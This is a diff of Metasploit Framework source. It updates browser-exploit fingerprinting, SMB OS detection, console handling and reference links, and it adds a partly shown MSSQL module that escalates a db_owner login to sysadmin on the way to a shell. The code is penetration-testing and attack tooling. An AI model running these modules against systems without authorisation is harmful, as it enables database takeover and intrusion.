:mshtml_build => 'mshtml_build', # mshtml build. Example: "65535"
|
||||
:flash => 'flash' # Example: "12.0" (chrome/ff) or "12.0.0.77" (IE)
|
||||
}
|
||||
REQUIREMENT_KEY_SET = Set.new([
|
||||
:source, # Either 'script' or 'headers'
|
||||
:ua_name, # Example: MSIE
|
||||
:ua_ver, # Example: 8.0, 9.0
|
||||
:os_name, # Example: Windows 7, Linux
|
||||
:os_flavor, # Example: Home, Enterprise
|
||||
:os_device, # Example: iPad, iPhone, etc
|
||||
:os_vendor, # Example: Microsoft, Ubuntu, Apple, etc
|
||||
:os_sp, # Example: SP2
|
||||
:language, # Example: en-us
|
||||
:arch, # Example: x86
|
||||
:proxy, # 'true' or 'false'
|
||||
:silverlight, # 'true' or 'false'
|
||||
:office, # Example: "2007", "2010"
|
||||
:java, # Example: 1.6, 1.6.0.0
|
||||
:clsid, # ActiveX clsid. Also requires the :method key
|
||||
:method, # ActiveX method. Also requires the :clsid key
|
||||
:mshtml_build, # mshtml build. Example: "65535"
|
||||
:flash, # Example: "12.0" (chrome/ff) or "12.0.0.77" (IE)
|
||||
:vuln_test # Example: "if(window.MyComponentIsInstalled)return true;"
|
||||
])
|
||||
|
||||
def initialize(info={})
|
||||
super
|
||||
|
@ -129,7 +133,7 @@ module Msf
|
|||
# @return [Hash] A hash of requirements
|
||||
#
|
||||
def extract_requirements(reqs)
|
||||
tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.has_key?(k.to_sym)}
|
||||
tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.include?(k.to_sym)}
|
||||
# Make sure keys are always symbols
|
||||
Hash[tmp.map{|(k,v)| [k.to_sym,v]}]
|
||||
end
|
||||
|
@ -189,9 +193,12 @@ module Msf
|
|||
# Special keys to ignore because the script registers this as [:activex] = true or false
|
||||
next if k == :clsid or k == :method
|
||||
|
||||
vprint_debug("Comparing requirement: #{k}=#{v} vs k=#{profile[k.to_sym]}")
|
||||
expected = k != :vuln_test ? v : 'true'
|
||||
vprint_debug("Comparing requirement: #{k}=#{expected} vs #{k}=#{profile[k.to_sym]}")
|
||||
|
||||
if v.is_a? Regexp
|
||||
if k == :vuln_test
|
||||
bad_reqs << k unless profile[k.to_sym].to_s == 'true'
|
||||
elsif v.is_a? Regexp
|
||||
bad_reqs << k if profile[k.to_sym] !~ v
|
||||
elsif v.is_a? Proc
|
||||
bad_reqs << k unless v.call(profile[k.to_sym])
|
||||
|
@ -207,8 +214,8 @@ module Msf
|
|||
# Returns the target profile based on the tag. Each profile has the following structure:
|
||||
# 'cookie_name' =>
|
||||
# {
|
||||
# :os_name => 'Windows',
|
||||
# :os_flavor => 'something'
|
||||
# :os_name => 'Windows 7',
|
||||
# :os_flavor => 'Enterprise',
|
||||
# ...... etc ......
|
||||
# }
|
||||
# A profile should at least have info about the following:
|
||||
|
@ -216,8 +223,8 @@ module Msf
|
|||
# should be more accurate in some scenarios like browser compatibility mode
|
||||
# :ua_name : The name of the browser
|
||||
# :ua_ver : The version of the browser
|
||||
# :os_name : The name of the OS
|
||||
# :os_flavor : The flavor of the OS (example: XP)
|
||||
# :os_name : The name of the OS ("Windows XP")
|
||||
# :os_flavor : The edition of the OS ("Home")
|
||||
# :language : The system's language
|
||||
# :arch : The system's arch
|
||||
# :proxy : Indicates whether proxy is used
|
||||
|
@ -361,7 +368,7 @@ module Msf
|
|||
<%= js_os_detect %>
|
||||
<%= js_ajax_post %>
|
||||
<%= js_misc_addons_detect %>
|
||||
<%= js_ie_addons_detect if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
|
||||
<%= js_ie_addons_detect if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
|
||||
|
||||
function objToQuery(obj) {
|
||||
var q = [];
|
||||
|
@ -375,19 +382,22 @@ module Msf
|
|||
window.onload = function() {
|
||||
var osInfo = os_detect.getVersion();
|
||||
var d = {
|
||||
"<%=REQUIREMENT_KEY_SET[:os_name]%>" : osInfo.os_name,
|
||||
"<%=REQUIREMENT_KEY_SET[:os_flavor]%>" : osInfo.os_flavor,
|
||||
"<%=REQUIREMENT_KEY_SET[:ua_name]%>" : osInfo.ua_name,
|
||||
"<%=REQUIREMENT_KEY_SET[:ua_ver]%>" : osInfo.ua_version,
|
||||
"<%=REQUIREMENT_KEY_SET[:arch]%>" : osInfo.arch,
|
||||
"<%=REQUIREMENT_KEY_SET[:java]%>" : misc_addons_detect.getJavaVersion(),
|
||||
"<%=REQUIREMENT_KEY_SET[:silverlight]%>" : misc_addons_detect.hasSilverlight(),
|
||||
"<%=REQUIREMENT_KEY_SET[:flash]%>" : misc_addons_detect.getFlashVersion()
|
||||
"os_name" : osInfo.os_name,
|
||||
"os_flavor" : osInfo.os_flavor,
|
||||
"os_vendor" : osInfo.os_vendor,
|
||||
"os_device" : osInfo.os_device,
|
||||
"ua_name" : osInfo.ua_name,
|
||||
"ua_ver" : osInfo.ua_version,
|
||||
"arch" : osInfo.arch,
|
||||
"java" : misc_addons_detect.getJavaVersion(),
|
||||
"silverlight" : misc_addons_detect.hasSilverlight(),
|
||||
"flash" : misc_addons_detect.getFlashVersion(),
|
||||
"vuln_test" : <%= js_vuln_test %>
|
||||
};
|
||||
|
||||
<% if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
|
||||
d['<%=REQUIREMENT_KEY_SET[:office]%>'] = ie_addons_detect.getMsOfficeVersion();
|
||||
d['<%=REQUIREMENT_KEY_SET[:mshtml_build]%>'] = ScriptEngineBuildVersion().toString();
|
||||
<% if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
|
||||
d['office'] = ie_addons_detect.getMsOfficeVersion();
|
||||
d['mshtml_build'] = ScriptEngineBuildVersion().toString();
|
||||
<%
|
||||
clsid = @requirements[:clsid]
|
||||
method = @requirements[:method]
|
||||
|
@ -497,6 +507,12 @@ module Msf
|
|||
method(:on_request_exploit).call(cli, request, profile)
|
||||
else
|
||||
print_warning("Exploit requirement(s) not met: #{bad_reqs * ', '}. For more info: http://r-7.co/PVbcgx")
|
||||
if bad_reqs.include?(:vuln_test)
|
||||
error_string = (self.module_info['BrowserRequirements'] || {})[:vuln_test_error]
|
||||
if error_string.present?
|
||||
print_warning(error_string)
|
||||
end
|
||||
end
|
||||
send_not_found(cli)
|
||||
end
|
||||
end
|
||||
|
@ -547,13 +563,24 @@ module Msf
|
|||
arch = browser_info[:arch]
|
||||
platform = browser_info[:os_name]
|
||||
|
||||
# Fix names for consisntecy so our API can find the right one
|
||||
# Fix names for consistency so our API can find the right one
|
||||
# Originally defined in lib/msf/core/constants.rb
|
||||
platform = platform.gsub(/^Mac OS X$/, 'OSX')
|
||||
platform = platform.gsub(/^Microsoft Windows$/, 'Windows')
|
||||
platform = platform.gsub(/^Windows.*$/, 'Windows')
|
||||
|
||||
regenerate_payload(cli, platform, arch).encoded
|
||||
end
|
||||
|
||||
# @return [String] custom Javascript to check if a vulnerability is present
|
||||
def js_vuln_test
|
||||
all_reqs = self.module_info['BrowserRequirements'] || {}
|
||||
if all_reqs[:vuln_test].present?
|
||||
code = all_reqs[:vuln_test] + ';return !!this.is_vuln;'
|
||||
'Function(('+JSON.generate(:code => code)+').code)()'
|
||||
else
|
||||
'true'
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -329,93 +329,53 @@ module Exploit::Remote::SMB
|
|||
fprint = {}
|
||||
|
||||
# Connect to the server if needed
|
||||
if(not self.simple)
|
||||
if not self.simple
|
||||
connect()
|
||||
smb_login()
|
||||
end
|
||||
|
||||
fprint['native_os'] = smb_peer_os()
|
||||
fprint['native_lm'] = smb_peer_lm()
|
||||
|
||||
# Leverage Recog for SMB native OS fingerprinting
|
||||
fp_match = Recog::Nizer.match('smb.native_os', fprint['native_os']) || { }
|
||||
|
||||
os = 'Unknown'
|
||||
sp = ''
|
||||
os = fp_match['os.product'] || 'Unknown'
|
||||
sp = fp_match['os.version'] || ''
|
||||
|
||||
case smb_peer_os()
|
||||
when 'Windows NT 4.0'
|
||||
os = 'Windows NT 4.0'
|
||||
|
||||
when 'Windows 5.0'
|
||||
os = 'Windows 2000'
|
||||
|
||||
when 'Windows 5.1'
|
||||
os = 'Windows XP'
|
||||
|
||||
when /Windows XP (\d+) Service Pack (\d+)/
|
||||
os = 'Windows XP'
|
||||
sp = 'Service Pack ' + $2
|
||||
|
||||
when /Windows Server 2003 (\d+)$/
|
||||
os = 'Windows 2003'
|
||||
sp = 'No Service Pack'
|
||||
|
||||
when /Windows Server 2003 (\d+) Service Pack (\d+)/
|
||||
os = 'Windows 2003'
|
||||
sp = 'Service Pack ' + $2
|
||||
|
||||
when /Windows Server 2003 R2 (\d+) Service Pack (\d+)/
|
||||
os = 'Windows 2003 R2'
|
||||
sp = 'Service Pack ' + $2
|
||||
|
||||
when /Windows Vista \(TM\) (\w+|\w+ \w+) (\d+) Service Pack (\d+)/
|
||||
os = 'Windows Vista ' + $1
|
||||
sp = 'Service Pack ' + $3
|
||||
|
||||
when /Windows Vista \(TM\) (\w+|\w+ \w+) (\d+)/
|
||||
os = 'Windows Vista ' + $1
|
||||
sp = '(Build ' + $2 + ')'
|
||||
|
||||
when /Windows Server \(R\) 2008 (([\-\w]+ ){1,4})(\d+) Service Pack (\d+)/
|
||||
os = 'Windows 2008 ' + $1.strip
|
||||
sp = 'Service Pack ' + $4
|
||||
|
||||
when /Windows Server \(R\) 2008 (([\-\w]+ ){1,4})(\d+)/
|
||||
os = 'Windows 2008 ' + $1.strip
|
||||
sp = '(Build ' + $3 + ')'
|
||||
|
||||
when /Windows \(R\) Storage Server 2008 (([\-\w]+ ){1,4})(\d+) Service Pack (\d+)/
|
||||
os = 'Windows 2008 Storage Server ' + $1.strip
|
||||
sp = 'Service Pack ' + $4
|
||||
|
||||
when /Windows \(R\) Storage Server 2008 (([\-\w]+ ){1,4})(\d+)/
|
||||
os = 'Windows 2008 Storage Server ' + $1.strip
|
||||
sp = '(Build ' + $3 + ')'
|
||||
|
||||
when /Windows 7 (([\-\w]+ ){1,4})(\d+)/
|
||||
os = 'Windows 7 ' + $1.strip
|
||||
sp = '(Build ' + $3 + ')'
|
||||
|
||||
when /^(Windows.*) Service Pack (\d+)/
|
||||
os = $1.strip
|
||||
sp = 'Service Pack ' + $2
|
||||
|
||||
when /^(Windows.*) (\d+)/
|
||||
os = $1.strip
|
||||
sp = '(Build ' + $2 + ')'
|
||||
|
||||
when 'VxWorks'
|
||||
os = 'VxWorks'
|
||||
sp = smb_peer_lm()
|
||||
|
||||
when 'Unix'
|
||||
os = 'Unix'
|
||||
sv = smb_peer_lm()
|
||||
case sv
|
||||
when /Samba\s+(.*)/i
|
||||
sp = 'Samba ' + $1
|
||||
end
|
||||
# Metasploit prefers 'Windows 2003' vs 'Windows Server 2003'
|
||||
if os =~ /^Windows Server/
|
||||
os = os.sub(/^Windows Server/, 'Windows')
|
||||
end
|
||||
|
||||
if fp_match['os.edition']
|
||||
fprint['edition'] = fp_match['os.edition']
|
||||
end
|
||||
|
||||
if (os == 'Windows XP' and sp.length == 0)
|
||||
if fp_match['os.build']
|
||||
fprint['build'] = fp_match['os.build']
|
||||
end
|
||||
|
||||
if sp == ''
|
||||
sp = smb_fingerprint_windows_sp(os)
|
||||
end
|
||||
|
||||
lang = smb_fingerprint_windows_lang
|
||||
|
||||
fprint['os'] = os
|
||||
fprint['sp'] = sp
|
||||
fprint['lang'] = lang
|
||||
|
||||
fprint
|
||||
end
|
||||
|
||||
#
|
||||
# Determine the service pack level of a Windows system via SMB probes
|
||||
#
|
||||
def smb_fingerprint_windows_sp(os)
|
||||
sp = ''
|
||||
|
||||
if (os == 'Windows XP')
|
||||
# SRVSVC was blocked in SP2
|
||||
begin
|
||||
smb_create("\\SRVSVC")
|
||||
|
@ -510,6 +470,14 @@ module Exploit::Remote::SMB
|
|||
end
|
||||
end
|
||||
|
||||
sp
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Determine the native language pack of a Windows system via SMB probes
|
||||
#
|
||||
def smb_fingerprint_windows_lang
|
||||
|
||||
#
|
||||
# Remote language detection via Print Providers
|
||||
|
@ -663,12 +631,7 @@ module Exploit::Remote::SMB
|
|||
raise $!
|
||||
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
|
||||
end
|
||||
|
||||
fprint['os'] = os
|
||||
fprint['sp'] = sp
|
||||
fprint['lang'] = lang
|
||||
|
||||
fprint
|
||||
lang
|
||||
end
|
||||
|
||||
# @return [Rex::Proto::SMB::SimpleClient]
|
||||
|
|
|
@ -70,7 +70,7 @@ module ReverseTcp
|
|||
#
|
||||
def setup_handler
|
||||
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
|
||||
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
|
||||
raise RuntimeError, "TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour."
|
||||
end
|
||||
|
||||
ex = false
|
||||
|
|
|
@ -93,21 +93,23 @@ class Msf::Module::SiteReference < Msf::Module::Reference
|
|||
self.ctx_val = in_ctx_val
|
||||
|
||||
if (in_ctx_id == 'OSVDB')
|
||||
self.site = 'http://www.osvdb.org/' + in_ctx_val.to_s
|
||||
self.site = "http://www.osvdb.org/#{in_ctx_val}"
|
||||
elsif (in_ctx_id == 'CVE')
|
||||
self.site = "http://cvedetails.com/cve/#{in_ctx_val.to_s}/"
|
||||
self.site = "http://cvedetails.com/cve/#{in_ctx_val}/"
|
||||
elsif (in_ctx_id == 'CWE')
|
||||
self.site = "http://cwe.mitre.org/data/definitions/#{in_ctx_val.to_s}.html"
|
||||
self.site = "http://cwe.mitre.org/data/definitions/#{in_ctx_val}.html"
|
||||
elsif (in_ctx_id == 'BID')
|
||||
self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
|
||||
self.site = "http://www.securityfocus.com/bid/#{in_ctx_val}"
|
||||
elsif (in_ctx_id == 'MSB')
|
||||
self.site = 'http://technet.microsoft.com/en-us/security/bulletin/' + in_ctx_val.to_s
|
||||
self.site = "http://technet.microsoft.com/en-us/security/bulletin/#{in_ctx_val}"
|
||||
elsif (in_ctx_id == 'EDB')
|
||||
self.site = 'http://www.exploit-db.com/exploits/' + in_ctx_val.to_s
|
||||
self.site = "http://www.exploit-db.com/exploits/#{in_ctx_val}"
|
||||
elsif (in_ctx_id == 'US-CERT-VU')
|
||||
self.site = 'http://www.kb.cert.org/vuls/id/' + in_ctx_val.to_s
|
||||
self.site = "http://www.kb.cert.org/vuls/id/#{in_ctx_val}"
|
||||
elsif (in_ctx_id == 'ZDI')
|
||||
self.site = 'http://www.zerodayinitiative.com/advisories/ZDI-' + in_ctx_val.to_s
|
||||
self.site = "http://www.zerodayinitiative.com/advisories/ZDI-#{in_ctx_val}"
|
||||
elsif (in_ctx_id == 'WPVDB')
|
||||
self.site = "https://wpvulndb.com/vulnerabilities/#{in_ctx_val}"
|
||||
elsif (in_ctx_id == 'URL')
|
||||
self.site = in_ctx_val.to_s
|
||||
else
|
||||
|
|
|
@ -111,7 +111,13 @@ module Msf::Post::Common
|
|||
o << d
|
||||
end
|
||||
o.chomp! if o
|
||||
process.channel.close
|
||||
|
||||
begin
|
||||
process.channel.close
|
||||
rescue IOError => e
|
||||
# Channel was already closed, but we got the cmd output, so let's soldier on.
|
||||
end
|
||||
|
||||
process.close
|
||||
when /shell/
|
||||
o = session.shell_command_token("#{cmd} #{args}", time_out)
|
||||
|
|
|
@ -24,6 +24,7 @@ module Banner
|
|||
wake-up-neo.txt
|
||||
workflow.txt
|
||||
3kom-superhack.txt
|
||||
metasploit-park.txt
|
||||
}
|
||||
|
||||
#
|
||||
|
|
|
@ -2009,7 +2009,7 @@ class Core
|
|||
res << 'ENCODER'
|
||||
end
|
||||
|
||||
if (mod.auxiliary?)
|
||||
if mod.kind_of?(Msf::Module::HasActions)
|
||||
res << "ACTION"
|
||||
end
|
||||
|
||||
|
@ -2149,10 +2149,10 @@ class Core
|
|||
print_error("No exploit module selected.")
|
||||
end
|
||||
when "actions"
|
||||
if (mod and (mod.auxiliary? or mod.post?))
|
||||
if mod && mod.kind_of?(Msf::Module::HasActions)
|
||||
show_actions(mod)
|
||||
else
|
||||
print_error("No auxiliary module selected.")
|
||||
print_error("No module with actions selected.")
|
||||
end
|
||||
|
||||
else
|
||||
|
@ -2721,8 +2721,8 @@ class Core
|
|||
return option_values_encoders() if opt.upcase == 'StageEncoder'
|
||||
end
|
||||
|
||||
# Well-known option names specific to auxiliaries
|
||||
if (mod.auxiliary?)
|
||||
# Well-known option names specific to modules with actions
|
||||
if mod.kind_of?(Msf::Module::HasActions)
|
||||
return option_values_actions() if opt.upcase == 'ACTION'
|
||||
end
|
||||
|
||||
|
@ -2869,7 +2869,7 @@ class Core
|
|||
|
||||
|
||||
#
|
||||
# Provide valid action options for the current auxiliary module
|
||||
# Provide valid action options for the current module
|
||||
#
|
||||
def option_values_actions
|
||||
res = []
|
||||
|
@ -3146,6 +3146,12 @@ class Core
|
|||
print("\nExploit target:\n\n#{mod_targ}\n") if (mod_targ and mod_targ.length > 0)
|
||||
end
|
||||
|
||||
# Print the selected action
|
||||
if mod.kind_of?(Msf::Module::HasActions) && mod.action
|
||||
mod_action = Serializer::ReadableText.dump_module_action(mod, ' ')
|
||||
print("\n#{mod.type.capitalize} action:\n\n#{mod_action}\n") if (mod_action and mod_action.length > 0)
|
||||
end
|
||||
|
||||
# Uncomment this line if u want target like msf2 format
|
||||
#print("\nTarget: #{mod.target.name}\n\n")
|
||||
end
|
||||
|
@ -3202,8 +3208,8 @@ class Core
|
|||
end
|
||||
|
||||
def show_actions(mod) # :nodoc:
|
||||
mod_actions = Serializer::ReadableText.dump_auxiliary_actions(mod, ' ')
|
||||
print("\nAuxiliary actions:\n\n#{mod_actions}\n") if (mod_actions and mod_actions.length > 0)
|
||||
mod_actions = Serializer::ReadableText.dump_module_actions(mod, ' ')
|
||||
print("\n#{mod.type.capitalize} actions:\n\n#{mod_actions}\n") if (mod_actions and mod_actions.length > 0)
|
||||
end
|
||||
|
||||
def show_advanced_options(mod) # :nodoc:
|
||||
|
|
|
@ -125,13 +125,12 @@ module ModuleCommandDispatcher
|
|||
defanged?
|
||||
|
||||
ip_range_arg = args.shift || mod.datastore['RHOSTS'] || framework.datastore['RHOSTS'] || ''
|
||||
hosts = Rex::Socket::RangeWalker.new(ip_range_arg)
|
||||
opt = Msf::OptAddressRange.new('RHOSTS')
|
||||
|
||||
begin
|
||||
if hosts.ranges.blank?
|
||||
# Check a single rhost
|
||||
check_simple
|
||||
else
|
||||
if !ip_range_arg.blank? && opt.valid?(ip_range_arg)
|
||||
hosts = Rex::Socket::RangeWalker.new(opt.normalize(ip_range_arg))
|
||||
|
||||
# Check multiple hosts
|
||||
last_rhost_opt = mod.rhost
|
||||
last_rhosts_opt = mod.datastore['RHOSTS']
|
||||
|
@ -144,7 +143,14 @@ module ModuleCommandDispatcher
|
|||
mod.datastore['RHOSTS'] = last_rhosts_opt
|
||||
mod.cleanup
|
||||
end
|
||||
else
|
||||
# Check a single rhost
|
||||
unless Msf::OptAddress.new('RHOST').valid?(mod.datastore['RHOST'])
|
||||
raise Msf::OptionValidateError.new(['RHOST'])
|
||||
end
|
||||
check_simple
|
||||
end
|
||||
|
||||
rescue ::Interrupt
|
||||
# When the user sends interrupt trying to quit the task, some threads will still be active.
|
||||
# This means even though the console tells the user the task has aborted (or at least they
|
||||
|
@ -182,16 +188,22 @@ module ModuleCommandDispatcher
|
|||
print_status("#{peer} - #{code[1]}")
|
||||
end
|
||||
else
|
||||
print_error("#{peer} - Check failed: The state could not be determined.")
|
||||
msg = "#{peer} - Check failed: The state could not be determined."
|
||||
print_error(msg)
|
||||
elog("#{msg}\n#{caller.join("\n")}")
|
||||
end
|
||||
rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error
|
||||
rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error => e
|
||||
# Connection issues while running check should be handled by the module
|
||||
rescue ::RuntimeError
|
||||
elog("#{e.message}\n#{e.backtrace.join("\n")}")
|
||||
rescue ::RuntimeError => e
|
||||
# Some modules raise RuntimeError but we don't necessarily care about those when we run check()
|
||||
elog("#{e.message}\n#{e.backtrace.join("\n")}")
|
||||
rescue Msf::OptionValidateError => e
|
||||
print_error("Check failed: #{e.message}")
|
||||
elog("#{e.message}\n#{e.backtrace.join("\n")}")
|
||||
rescue ::Exception => e
|
||||
print_error("#{peer} - Check failed: #{e.class} #{e}")
|
||||
elog("#{e.message}\n#{e.backtrace.join("\n")}")
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -0,0 +1,17 @@
|
|||
%clr%whi
|
||||
Metasploit Park, System Security Interface
|
||||
Version 4.0.5, Alpha E
|
||||
Ready...
|
||||
> %bldaccess security%clr
|
||||
access: PERMISSION DENIED.
|
||||
> %bldaccess security grid%clr
|
||||
access: PERMISSION DENIED.
|
||||
> %bldaccess main security grid%clr
|
||||
access: PERMISSION DENIED....and...
|
||||
%redYOU DIDN'T SAY THE MAGIC WORD!
|
||||
YOU DIDN'T SAY THE MAGIC WORD!
|
||||
YOU DIDN'T SAY THE MAGIC WORD!
|
||||
YOU DIDN'T SAY THE MAGIC WORD!
|
||||
YOU DIDN'T SAY THE MAGIC WORD!
|
||||
YOU DIDN'T SAY THE MAGIC WORD!
|
||||
YOU DIDN'T SAY THE MAGIC WORD!%clr
|
|
@ -15,10 +15,12 @@ class Detect
|
|||
# Provides several javascript functions for determining the OS and browser versions of a client.
|
||||
#
|
||||
# getVersion(): returns an object with the following properties
|
||||
# os_name - OS name, one of the Msf::OperatingSystems constants
|
||||
# os_flavor - OS flavor as a string (e.g.: "XP", "2000")
|
||||
# os_name - OS name such as "Windows 8", "Linux", "Mac OS X"
|
||||
# os_flavor - OS flavor as a string such as "Home", "Enterprise", etc
|
||||
# os_sp - OS service pack (e.g.: "SP2", will be empty on non-Windows)
|
||||
# os_lang - OS language (e.g.: "en-us")
|
||||
# os_vendor - A company or organization name such as Microsoft, Ubuntu, Apple, etc
|
||||
# os_device - A specific piece of hardware such as iPad, iPhone, etc
|
||||
# ua_name - Client name, one of the Msf::HttpClients constants
|
||||
# ua_version - Client version as a string (e.g.: "3.5.1", "6.0;SP2")
|
||||
# arch - Architecture, one of the ARCH_* constants
|
||||
|
|
|
@ -29,8 +29,12 @@ class ImageSource
|
|||
# FIXME, make me better
|
||||
string = ''
|
||||
loop do
|
||||
char = read(offset, 1)
|
||||
break if char == "\x00"
|
||||
begin
|
||||
char = read(offset, 1)
|
||||
rescue RangeError
|
||||
break
|
||||
end
|
||||
break if char.nil? || char == "\x00"
|
||||
offset += 1
|
||||
string << char
|
||||
end
|
||||
|
|
|
@ -504,7 +504,7 @@ module Rex
|
|||
}
|
||||
}
|
||||
note[:data][:vendor] = @report_data[:os]["os_vendor"] if @report_data[:os]["os_vendor"]
|
||||
note[:data][:product] = @report_data[:os]["os_product"] if @report_data[:os]["os_prduct"]
|
||||
note[:data][:product] = @report_data[:os]["os_product"] if @report_data[:os]["os_product"]
|
||||
note[:data][:version] = @report_data[:os]["os_version"] if @report_data[:os]["os_version"]
|
||||
note[:data][:arch] = @report_data[:os]["os_arch"] if @report_data[:os]["os_arch"]
|
||||
db_report(:note, note)
|
||||
|
|
|
@ -36,7 +36,7 @@ class Handler::Proc < Handler
|
|||
def on_request(cli, req)
|
||||
begin
|
||||
procedure.call(cli, req)
|
||||
rescue Errno::EPIPE
|
||||
rescue Errno::EPIPE, ::Errno::ECONNRESET, ::Errno::ENOTCONN, ::Errno::ECONNABORTED
|
||||
elog("Proc::on_request: Client closed connection prematurely", LogSource)
|
||||
rescue
|
||||
elog("Proc::on_request: #{$!.class}: #{$!}\n\n#{$@.join("\n")}", LogSource)
|
||||
|
|
|
@ -62,8 +62,9 @@ class RexUDPTransport
|
|||
@socket.sendto(data, host, port, flags)
|
||||
rescue NoMethodError
|
||||
@socket.send(data, 0, host, port)
|
||||
rescue ::Errno::EISCONN
|
||||
@socket.write(data)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def recv(max_bytes)
|
||||
|
|
|
@ -81,4 +81,6 @@ Gem::Specification.new do |spec|
|
|||
spec.add_runtime_dependency 'sqlite3'
|
||||
# required for Time::TZInfo in ActiveSupport
|
||||
spec.add_runtime_dependency 'tzinfo'
|
||||
# required for OS fingerprinting
|
||||
spec.add_runtime_dependency 'recog', '~> 1.0'
|
||||
end
|
||||
|
|
|
@ -13,10 +13,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Description' => %q{
|
||||
The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download
|
||||
a SQL dump of the plugins database tables. It's also possible to upload files containing
|
||||
sql statements which will be executed. The module first tries to extract the WordPress
|
||||
SQL statements which will be executed. The module first tries to extract the WordPress
|
||||
table prefix from the dump and then attempts to create a new admin user.
|
||||
},
|
||||
'Author' =>
|
||||
'Author' =>
|
||||
[
|
||||
'Marc-Alexandre Montpas', # Vulnerability discovery
|
||||
'Christian Mehlmauer' # Metasploit module
|
||||
|
@ -25,7 +25,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html' ],
|
||||
[ 'URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=' ]
|
||||
[ 'URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=' ],
|
||||
[ 'WPVDB', '7542' ]
|
||||
],
|
||||
'DisclosureDate' => 'Aug 07 2014'
|
||||
))
|
||||
|
|
|
@ -0,0 +1,185 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/mssql_commands'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SQL Server - Escalate Db_Owner',
|
||||
'Description' => %q{
|
||||
This module can be used to escalate privileges to sysadmin if the user has
|
||||
the db_owner role in a trustworthy database owned by a sysadmin user. Once
|
||||
the user has the sysadmin role the msssql_payload module can be used to obtain
|
||||
a shell on the system.
|
||||
},
|
||||
'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>'],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [[ 'URL','http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx']]
|
||||
))
|
||||
end
|
||||
|
||||
def run
|
||||
# Check connection and issue initial query
|
||||
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
|
||||
if mssql_login_datastore
|
||||
print_good('Connected.')
|
||||
else
|
||||
print_error('Login was unsuccessful. Check your credentials.')
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
# Query for sysadmin status
|
||||
print_status("Checking if #{datastore['USERNAME']} has the sysadmin role...")
|
||||
user_status = check_sysadmin
|
||||
|
||||
# Check if user has sysadmin role
|
||||
if user_status == 1
|
||||
print_good("#{datastore['USERNAME']} has the sysadmin role, no escalation required.")
|
||||
disconnect
|
||||
return
|
||||
else
|
||||
print_status("You're NOT a sysadmin, let's try to change that")
|
||||
end
|
||||
|
||||
# Check for trusted databases owned by sysadmins
|
||||
print_status("Checking for trusted databases owned by sysadmins...")
|
||||
trust_db_list = check_trust_dbs
|
||||
if trust_db_list.nil? || trust_db_list.length == 0
|
||||
print_error('No databases owned by sysadmin were found flagged as trustworthy.')
|
||||
disconnect
|
||||
return
|
||||
else
|
||||
# Display list of accessible databases to user
|
||||
print_good("#{trust_db_list.length} affected database(s) were found:")
|
||||
trust_db_list.each do |db|
|
||||
print_status(" - #{db[0]}")
|
||||
end
|
||||
end
|
||||
|
||||
# Check if the user has the db_owner role in any of the databases
|
||||
print_status('Checking if the user has the db_owner role in any of them...')
|
||||
dbowner_status = check_db_owner(trust_db_list)
|
||||
if dbowner_status.nil?
|
||||
print_error("Fail buckets, the user doesn't have db_owner role anywhere.")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
# Attempt to escalate to sysadmin
|
||||
print_status("Attempting to escalate in #{dbowner_status}!")
|
||||
escalate_status = escalate_privs(dbowner_status)
|
||||
if escalate_status
|
||||
# Check if escalation was successful
|
||||
user_status = check_sysadmin
|
||||
if user_status == 1
|
||||
print_good("Congrats, #{datastore['USERNAME']} is now a sysadmin!.")
|
||||
else
|
||||
print_error("Fail buckets, something went wrong.")
|
||||
end
|
||||
else
|
||||
print_error("Error while trying to escalate status")
|
||||
end
|
||||
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
# Checks if user is already sysadmin
|
||||
def check_sysadmin
|
||||
# Setup query to check for sysadmin
|
||||
sql = "select is_srvrolemember('sysadmin') as IsSysAdmin"
|
||||
|
||||
# Run query
|
||||
result = mssql_query(sql)
|
||||
|
||||
# Parse query results
|
||||
